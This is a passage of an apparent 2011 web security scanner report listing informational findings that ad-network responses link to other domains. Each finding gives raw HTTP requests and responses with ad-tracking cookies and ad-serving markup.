PRcp=|AKLCAA2c:1|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FKqE:1|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:1|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FKqEGKwo:1|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:36:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4402
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-8E99-8AB9-0309-8D40011C0203; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://adclick.g.doubleclick.net/aclk?sa=L&ai=BIxur6wnITYvYL8G6lQfEiM2BDqTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEGmALADLgCGMgC5In4GeACAOoCEDMwMHgyNTBDX0dlbmVyYWyQA6QDmAPgA6gDAegDa-gDkwXoA5gD6AOLCegDjAn1AwIEAET1AyAAAADgBAE&num=1&sig=AGiWqtwblKQkvKvYR7-meTWiSF-YSMCUiw&client=ca-pub-6743622525202572&adurl=http://clk.pointroll.com/bc/?a=1472054&c=1&i=D9A20400-8E99-8AB9-0309-8D40011C0203&clickurl=http://ad.doubleclick.net/click%3Bh=v2%7C3DC0%7C0%7C0%7C%252a%7Cd%3B239992381%3B0-0%3B0%3B60927427%3B31-1%7C1%3B41081340%7C41099127%7C1%3B%3B%253fhttp://www.ford.com/commercial-trucks/%3Fbannerid=691050%7C60927427%7C239992381%7C0%26referrer=N3106.GoogleContentNetwork'><img border=0 width='300' height='250' style='width:300px;height:250px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Ford/861911/CommTruck_Season_2010_300x250_DFLT_101410.jpg?PRAd=1472054&PR
...[SNIP]...

17.13. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1278430A22620110421174444&flash=10&time=13049554901|10:38|-5&redir=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizsOgEAIBa.yobaAfY8leKaNnZXx7kJiNTN8HgHkHEstjiGY7ZZuWWUVwgVmhk8qAGq4S1_2rqYaXf02i_6Txeveu3SVkm7vBykHFGc-%26redirectURL=$CTURL$&pos=x&dom=http://optimized-by.rubiconproject.com&r=0.17236664076335728 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=280&cb=2578662&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmco7OtAEECAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-A39C-ADB3-0309-A36001040200; PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:11|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:2|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:2|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:38:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 1999
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmg43mJ!EQCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-E3A0-8979-1309-A36001100200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:12|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:3|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FW9q:1|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:3|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FW9qGLZC:1|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtizsOgEAIBa.yobaAfY8leKaNnZXx7kJiNTN8HgHkHEstjiGY7ZZuWWUVwgVmhk8qAGq4S1_2rqYaXf02i_6Txeveu3SVkm7vBykHFGc-&redirectURL=http://clk.pointroll.com/bc/?a=1473804&c=1&i=D9A20400-E3A0-8979-1309-A36001100200&clickurl=http://www.playtexbramakeover.com/'><img border=0 width='728' height='90' style='width:728px;height:90px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Hanes/863118/PTX_728x90_BF.jpg?PRAd=1473804&PRCID=1473804&PRplcmt=1278430&P
...[SNIP]...

17.14. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MDY0MzgzODQ4MjEwODI1OS8xMTI3MTEvMTAxNzc4LzQvX2ZrTzhjMkc0aHVUREhNaTB2REd4bUZyWW93T240Z0pWR3dZWGlIQ3JTby8/wx5pTXc5IEg4EhGauv_ZowQal6A&price=TcgKYwADH_oK5XtBnK9ekEmaWNoad9RlH1xSlQ&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBkRfnYwrITfq_DMH2lQeQvb3lCdzvj_EB-PbyvBGErMGhDwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHg6pnsA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBSWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzcy8yMDExLzA1MDkvR2FzLXByaWNlcy1zdGFydC10by1oZWFkLWRvd26YAugHwAIEyALWwYwO4AIA6gIQMzAweDI1MENfR2VuZXJhbKgDAegD9AnoA5MF6AORA_UDAAQARPUDIAAAAOAEAYAGgIqNvobDucuOAQ%26num%3D1%26sig%3DAGiWqtzdUBy3-sRSj_5-4w3QHutXcJep2g%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1304949603; mt_mop=4:1304955375

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:46 GMT
Set-Cookie: mt_mop=4:1304955494; domain=.mathtag.com; path=/; expires=Thu, 08 May 2014 15:38:46 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Mon, 09 May 2011 15:38:11 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x6, ewr-bidder-x2
Server: MMBD/3.5.5
Content-Length: 999
Content-Type: text/html
Connection: keep-alive

<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2363415&PluID=0&w=300&h=250&ord=60643838482108259&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=60643838482108259&mt_id=112711&mt_adid=100341&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.mediamath.com$$"></script>
...[SNIP]...
259&mt_id=112711&mt_adid=100341&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=brd&FlightID=2363415&Page=&PluID=0&Pos=6279" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2363415&Page=&PluID=0&Pos=6279" border=0 width=300 height=250></a>
...[SNIP]...

17.15. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304949603

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:16 GMT
Set-Cookie: mt_mop=4:1304955375; domain=.mathtag.com; path=/; expires=Thu, 08 May 2014 15:36:16 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Mon, 09 May 2011 15:36:12 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x6, ewr-bidder-x2
Server: MMBD/3.5.5
Content-Length: 1125
Content-Type: text/html
Connection: keep-alive

<IFRAME SRC="http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect="></SCRIPT>
...[SNIP]...
285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://ad.doubleclick.net/jump/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629?"><IMG SRC="http://ad.doubleclick.net/ad/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.16. http://choices.truste.com/ca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:58 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3988

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
<hr />\
<a href="http://bit.ly/dKnbdp" target="_blank">Online Privacy Library &raquo;</a>
...[SNIP]...
<hr />\
<a href="http://bit.ly/ffdQkR" target="_blank">AT&amp;T Privacy FAQ &raquo;</b>
...[SNIP]...

17.17. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:03 GMT;path=/;domain=.zedo.com;
